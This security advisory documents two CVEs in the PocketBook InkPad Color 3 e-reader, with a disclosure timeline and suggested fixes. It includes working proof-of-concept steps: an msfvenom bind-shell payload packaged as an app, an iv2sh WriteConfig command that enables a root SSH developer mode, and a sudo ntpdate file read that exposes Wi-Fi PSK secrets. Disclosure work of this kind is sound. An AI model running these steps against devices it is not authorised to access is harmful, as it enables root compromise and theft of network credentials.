Recently, I promised myself to read more. In the past however, I was always slightly annoyed at having to carry books around, and reading PDFs on a smartphone was not really a convenient option either. So I searched for an e-reader that could solve these problems. The device I chose was a Pocketbook InkPad Color 3. This e-reader has one crucial feature that stood out: it allows you to install custom applications such as KOReader. Since I believe that everyone should have full control over a device that they own, I wondered whether any jailbreaks exist that would allow me to escalate privileges. So, I began looking on the internet and it seemed that prior jailbreaks for similar devices were patched and I was apparently out of luck. Nevertheless, the device ticked all other boxes so I decided to order one anyway and take up the challenge myself.

After just a few days I found a privilege escalation vulnerability due to an unintended use of an SUID binary to enable the developer mode as well as a second vulnerability allowing users to read file content from the device. This following write-up explains the process as well as the identified vulnerabilities on a technical level and proposes possible fixes and mitigations.

For both vulnerabilities a coordinated vulnerability disclosure was initiated with the vendor PocketBook. Unfortunately, despite a quite positive initial communication with the vendor, both vulnerabilities remain unpatched at the time of the advisory publication (2025-03-04).

Overview of Findings

The following security vulnerabilities have been identified:

• CVE-2025-1424 Privilege Escalation Through SUID Binary and Developer Mode
  
• CVE-2025-1425 File Read Through Improper Sudo Privilege Management

Preface: Getting a Shell

The first goal was to get an interactive shell on the device itself. Since the most common threat model for this device is an attacker having physical access to the device, there are numerous paths to achieve this. However, since I did not want to instantly break the device, I initially focused on non-intrusive options. That left me with USB or network communication such as Wi-Fi and Bluetooth as the remaining options.

Since we already know that custom applications can be installed, I looked into how this was implemented. As it turns out, an executable file ending in .app, copied via the provided USB file transfer into the applications directory, is listed in the e-reader menu and can be executed. The following screenshot depicts how the device shows up after the e-reader is connected via USB and the PC LINK option was selected:

The same applications can then be found in the e-reader’s menu in the «user'» section:

This means, we can connect the PocketBook to the same Wi-Fi network, generate a classic bind shell for the ARM architecture using msfvenom and copy it using the PC LINK feature:

1
$ msfvenom -p linux/armle/shell_bind_tcp LPORT=1337 -f elf -o bind.app

After running the bind shell on the e-reader, we can connect to it and start issuing our own commands. With the id command we verify that we popped a shell and have limited privileges:

1
uid=101(reader) gid=101(reader) groups=3003

CVE-2025-1424: Privilege Escalation Through SUID Binary and Developer Mode

A privilege escalation on the PocketBook InkPad Color 3 allows attackers to escalate to root privileges if they gain physical access to the device.

CVSS v4.0 Score: 8.6 (HIGH)

Vulnerability Analysis

The device features multiple initialization scripts executed in certain cases. One such script contains the USB initialization, which is responsible for providing the mass storage when the PC LINK feature is active. This script is listed below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
$ cat /etc/init.d/usb
#!/bin/sh
. /ebrmain/config/device.cfg
# initialize usb gadget as empty mass storage
GDIR=/config/usb_gadget/g1
mkdir -p $GDIR
echo 0x1d6b >$GDIR/idVendor
echo 0x0104 >$GDIR/idProduct
echo 0x0100 >$GDIR/bcdDevice
echo 0x0200 >$GDIR/bcdUSB
mkdir $GDIR/strings/0x409
echo Obreey >$GDIR/strings/0x409/manufacturer
echo ${usb_product_name:-Pocketbook} > $GDIR/strings/0x409/product
echo 0xEF >$GDIR/bDeviceClass
echo 0x02 >$GDIR/bDeviceSubClass
echo 0x01 >$GDIR/bDeviceProtocol
echo 1       >$GDIR/os_desc/use
echo 0xcd    >$GDIR/os_desc/b_vendor_code
echo MSFT100 >$GDIR/os_desc/qw_sign
mkdir $GDIR/configs/c.1
echo 500 >$GDIR/configs/c.1/MaxPower

# initialize usb gadget as ncm interface
mkdir $GDIR/functions/rndis.0
echo RNDIS >$GDIR/functions/rndis.0/os_desc/interface.rndis/compatible_id
echo 5162001 >$GDIR/functions/rndis.0/os_desc/interface.rndis/sub_compatible_id
ln -s $GDIR/functions/rndis.0 $GDIR/configs/c.1
ln -s $GDIR/configs/c.1 $GDIR/os_desc/c.1

mkdir $GDIR/functions/mass_storage.0
ln -s $GDIR/functions/mass_storage.0 $GDIR/configs/c.1

# activate usb gadget
ls /sys/class/udc >$GDIR/UDC

if [ -f /mnt/secure/developer_mode ] ; then
        NET=192.168.205
        UDHCONF=/var/run/udhcpd.conf
        usleep 250000
        ifconfig usb0 up $NET.1
        echo "start $NET.2" >$UDHCONF
        echo "end $NET.254" >>$UDHCONF
        echo "interface usb0" >>$UDHCONF
        echo "opt subnet 255.255.255.0" >>$UDHCONF
        /sbin/udhcpd $UDHCONF
        /sbin/dropbear -G $NET
fi

The last lines check if the file /mnt/secure/developer_mode exists. If this file is present on the filesystem, it configures USB tethering over RNDIS and starts a Dropbear SSH server. As such, if this file is present, a root shell is automatically provided via USB tethering. However, the /mnt/secure directory permissions do not allow the user reader to create new files. Instead, this path is only writable by the user sreader.

However, numerous SUID binaries are present which run under the sreader user account:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ ls -la /ebrmain/cramfs/bin | grep sr
-rwsr-sr-x    1 sreader  sreader     162488 Jun  7 10:45 Dictionary.app
-rwsr-sr-x    1 sreader  sreader      38760 Jun  7 10:45 acsm_fulfill.app
-rwsr-sr-x    1 sreader  sreader      22256 Jun  7 10:45 adobe_activation.app
-rwsr-sr-x    1 sreader  sreader     118404 Jun  7 10:45 adobescanner.app
-rwsr-sr-x    1 sreader  sreader    2819680 Jun  7 10:45 bookstore-2.app
-rwsr-sr-x    1 sreader  sreader      42920 Jun  7 10:45 bookstore.app
-rwsr-sr-x    1 sreader  sreader      30796 Jun  7 10:45 checkupdate
-rwsr-sr-x    1 root     root        265140 Jun  7 10:45 checkupdate-2
-rwsr-sr-x    1 sreader  sreader     425080 Jun  7 10:45 control_panel_mgr.app
-rwsr-sr-x    1 sreader  sreader      26552 Jun  7 10:45 dictpackageinstaller.app
-rwsr-sr-x    1 sreader  sreader     231760 Jun  7 10:45 download_device_parameters.app
-rwsr-sr-x    1 sreader  sreader     117096 Jun  7 10:45 eink-cache-reader.app
-rwsr-sr-x    1 sreader  sreader    2049756 Jun  7 10:45 eink-reader.app
-rwsr-sr-x    1 sreader  sreader    1445884 Jun  7 10:45 empik_store.app
-rwsr-sr-x    1 sreader  sreader      13940 Jun  7 10:45 epub_optimizer.app
-rwsr-sr-x    1 sreader  sreader    1238580 Jun  7 10:45 explorer-3
-rwsr-sr-x    1 sreader  sreader     248516 Jun  7 10:45 gesture_settings
-rwsr-sr-x    1 sreader  sreader      47168 Jun  7 10:45 input_dialog.app
-rwsr-sr-x    1 sreader  sreader      14204 Jun  7 10:45 iv2sh
-rwsr-sr-x    1 sreader  sreader     174320 Jun  7 10:45 legal_checker
-rwsr-sr-x    1 sreader  sreader     182516 Jun  7 10:45 legal_update
-rwsr-sr-x    1 sreader  sreader     396628 Jun  7 10:45 legalui.app
-rwsr-sr-x    1 sreader  sreader      18176 Jun  7 10:45 legimi_downloader
-rwsr-sr-x    1 sreader  sreader       9916 Jun  7 10:45 legimi_synchronizer
-rwsr-sr-x    1 sreader  sreader     277648 Jun  7 10:45 legimi_viewer.app
-rwsr-sr-x    1 sreader  sreader      44020 Jun  7 10:45 libronet_switcher.app
-rwsr-sr-x    1 root     root        306700 Jun  7 10:45 netagent
-rwsr-sr-x    1 root     root          5644 Jun  7 10:45 new_task.app
-rwsr-sr-x    1 sreader  sreader       9764 Jun  7 10:45 ntpdate.app
-rwsr-sr-x    1 sreader  sreader       9808 Jun  7 10:45 pbcloud_auth.app
-rwsr-sr-x    1 sreader  sreader       9820 Jun  7 10:45 return_loan.app
-rwsr-sr-x    1 sreader  sreader       9792 Jun  7 10:45 s2pb_wizard.app
-rwsr-sr-x    1 sreader  sreader    2246100 Jun  7 10:45 settings.app
-rwsr-sr-x    1 sreader  sreader     424448 Jun  7 10:45 setup_wizard.app
-rwsr-sr-x    1 sreader  sreader       9804 Jun  7 10:45 store-native-auth.app
-rwsr-sr-x    1 root     root        137980 Jun  7 10:45 sudo
-rwsr-sr-x    1 sreader  sreader     409184 Jun  7 10:45 sysinstall.app
-rwsr-sr-x    1 sreader  sreader      51292 Jun  7 10:45 tts_package_info_updater.app
-rwsr-sr-x    1 sreader  sreader     117196 Jun  7 10:45 tts_package_installer.app
-rwsr-sr-x    1 sreader  sreader     273404 Jun  7 10:45 tts_package_manager.app

Since the /mnt/secure directory is owned by sreader a vulnerability in one of those SUID binaries allows us to create a file in this directory. The binary iv2sh allows for multiple commands to run under sreader privileges:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ /usr/cramfs/bin/iv2sh xzy
do main_internal(/usr/cramfs/bin/iv2sh,xzy)
called iv2sh
do main_internal(xzy)
called xzy
unknown xzy
Available functions:
SendEventTo(task,type,par1,par2)
WriteConfig(cfg,param,value)
SetFrontlightState(flstate)
GetCustomizedPartner()
GetCustomizedPartnerName()
NetConnect((name))
SetActiveTask(task,subtask)
FindTaskByAppName(appname)
ReadConfig(cfg,param,default_value)
FastBookHash(filename)
WriteStartupLogo(filename)
WriteLowPowerLogo(filename)
QueryNetwork()
EnumDictionaries()
FindTaskByBook(book name)
GetResource(recource_name,file_name)
SetGSensorEnabled(0/1)
reboot()
StartSoftwareUpdate()
CloseTask(task (pid or name))
hw_change_logo_by_lang(1 - boot, 2 - low power)
Return 0

This includes the ability to create or parse configuration files:

1
2
3
4
5
6
7
8
$ sh -c '/usr/cramfs/bin/iv2sh WriteConfig /tmp/testtest redguard 1'
$ ls -la /tmp/testtest*
-rw-rw-rw-    1 sreader  sreader         22 Sep 13 20:32 /tmp/testtest
-rw-rw-rw-    1 sreader  sreader         22 Sep 13 20:32 /tmp/testtest.back
$ cat /tmp/testtest
redguard=1

#61338407

As a result, the iv2sh executable can be used to create the /mnt/secure/developer_mode file, enabling the development mode of the e-reader.

Preconditions

To exploit this vulnerability, attackers need to execute code on the device such as manually starting an application in the applications folder. This requires physical access to the device in order to copy an exploit onto the device.

Proof-of-Concept

As a proof-of-concept, the following command can be issued in a shell which creates the corresponding file:

1
$ sh -c '/usr/cramfs/bin/iv2sh WriteConfig /mnt/secure/developer_mode privesc 1'

Next, the device is restarted. Then a new USB network interface is shown:

1
2
3
4
5
6
7
8
9
$ ip a 
[...]
8: usb0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 12:95:37:f8:1b:bb brd ff:ff:ff:ff:ff:ff
    inet 192.168.205.2/24 brd 192.168.205.255 scope global dynamic noprefixroute usb0
       valid_lft 863603sec preferred_lft 863603sec
    inet6 fe80::1095:37ff:fef8:1bbb/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

This now allows to connect directly to the SSH server as the root user:

1
$ ssh -o HostKeyAlgorithms=ssh-rsa root@192.168.205.1 -v

Suggested Mitigations and Countermeasures

In order to mitigate this vulnerability, the following countermeasures should be considered by the vendor:

1. The functionality to write files as the user sreader should be removed from the affected SUID binary.
   
2. Verify the file permissions of the /mnt/secure/developer_mode file before enabling developer mode. For example, it could be verified whether the file owner is root.
   
3. The SUID binary attack surface should be reduced and thoroughly audited.
   
4. Rework the permissions for the user sreader to prevent mix-up with root privileges.
   
5. Allow users to set a device unlock password which has to be entered on boot.
   
6. Although difficult to implement on a device with limited resources, full disk encryption could be considered.

CVE-2025-1425: File Read Through Improper Sudo Privilege Management

A sudo privilege misconfiguration allows attackers to read file contents on the PocketBook InkPad Color 3. This vulnerability arises through a /etc/sudoers misconfiguration that allows any user to execute the ntpdate command with root privileges.

CVSS v4.0 Score: 4.7 (MEDIUM)

Vulnerability Analysis

Attackers with access to the device can open an interactive shell and read all files on the device. This is due to a misconfiguration in the sudo configuration on the e-reader.

Issuing the command sudo -l shows that the the user reader is allowed to run multiple commands as root:

1
2
3
4
User reader may run the following commands on this host:
    (ALL) NOPASSWD: /ebrmain/bin/sshstart.sh, (ALL) /ebrmain/bin/proftpd, (ALL)
    /ebrmain/bin/ip-over-usb-start.sh, (ALL) /sbin/ifconfig, (ALL)
    /ebrmain/bin/ntpdate

The scripts in /ebrmain/bin no longer exist on the device and the folder’s permissions don’t allow us to create new files. However, for ntpdate a GTFOBin entry exists, which allows us to read a file’s content. It should however be noted that the output of ntpdate does not necessarily print all of a file’s content. Depending on the content, only partial information will be shown.

Preconditions

To exploit this vulnerability attackers require a shell on the device. This typically requires physical access to the device in order to upload a shell which is then executed. While a network connection over Wi-Fi is not necessarily required, it makes exploitation easier and interactive.

Proof-of-Concept

For exploitation, the example listed in the GTFOBin entry can be used. The following commands read the contents of the /mnt/secure/network.conf file:

1
2
$ LFILE=/mnt/secure/network.conf
$ sudo /ebrmain/bin/ntpdate -a x -k $LFILE -d localhost

This results in the following output showing the Wi-Fi configuration including the PSK secrets:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 8 Nov 15:13:20 ntpdate[1849]: ntpdate 4.2.6p2@1.2194 Tue Apr 10 09:43:26 UTC 2012 (1)
Looking for host localhost and service ntp
host found : localhost
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key ctrl_interface=/var/run/wpa_supplicant/
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key update_config=1
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key network={
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key ssid="[...]"
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key psk=[...]
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key key_mgmt=WPA-PSK
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key id_str=""
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key }
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key network={
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key ssid="[...]"
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key psk=[...]
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key key_mgmt=WPA-PSK
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key id_str=""
[...]
 8 Nov 15:13:20 ntpdate[1849]: authentication key 0 unknown

Suggested Mitigations and Countermeasures

In order to mitigate this vulnerability, the following countermeasures should be considered by the vendor:

1. Remove the ntpdate utility from the /etc/sudoers configuration file. It is also recommended to remove any entry not strictly necessary.
   
2. Allow users to set a device unlock password which has to be entered on boot.
   
3. Although difficult to implement on a device with limited resources, full disk encryption could be considered.

Credits

• Benjamin Faller, Redguard AG

After I identified the vulnerabilities I noticed that Synacktiv had done great prior research on an older Pocketbook device. Synacktiv’s blog post is certainly worth reading since besides their privilege escalation they expand on other features such as the cryptographic secrets management.

Timeline

• 2024-11-12: Asked vendor via support form for a security contact to send the vulnerability details to.
  
• 2024-11-13: Received initial response from PocketBook support.
  
• 2024-11-13: Submitted preliminary vulnerability details to NCSC via web form.
  
• 2024-11-14: Submitted preliminary vulnerability details to PocketBook after deciding on a means of transfer.
  
• 2024-11-15: PocketBoot forwarded the information to the responsible department.
  
• 2024-12-16: Asked vendor for updates regarding a possible patch.
  
• 2024-12-17: Vendor answered that the details were passed on and will inform once they have information to share.
  
• 2025-01-10: Reminded vendor of disclosure timeline and asked when and if further information can be expected. The vendor then unexpectedly asked us to refrain from further contact them and indicated that they are unable to answer our questions.
  
• 2025-02-17: Contacted NCSC to reserve CVE-IDs and asked for further information on how to proceed with the vendor.
  
• 2025-02-18: NCSC reserved the CVE numbers and Redguard redefined the publication date of the coordinated vulnerability disclosure to be 2025-03-04 should the vendor not explicitly request an extension before this point.
• 2025-03-04: Publication of this advisory

About Redguard

Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organizational security audits and consulting. This enables us to have a team with extensive experience in a wide variety of security relevant topics.

• www.redguard.ch
• contact@redguard.ch

Disclaimer

This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible, and indeed likely, that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing, based on currently available information.

Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.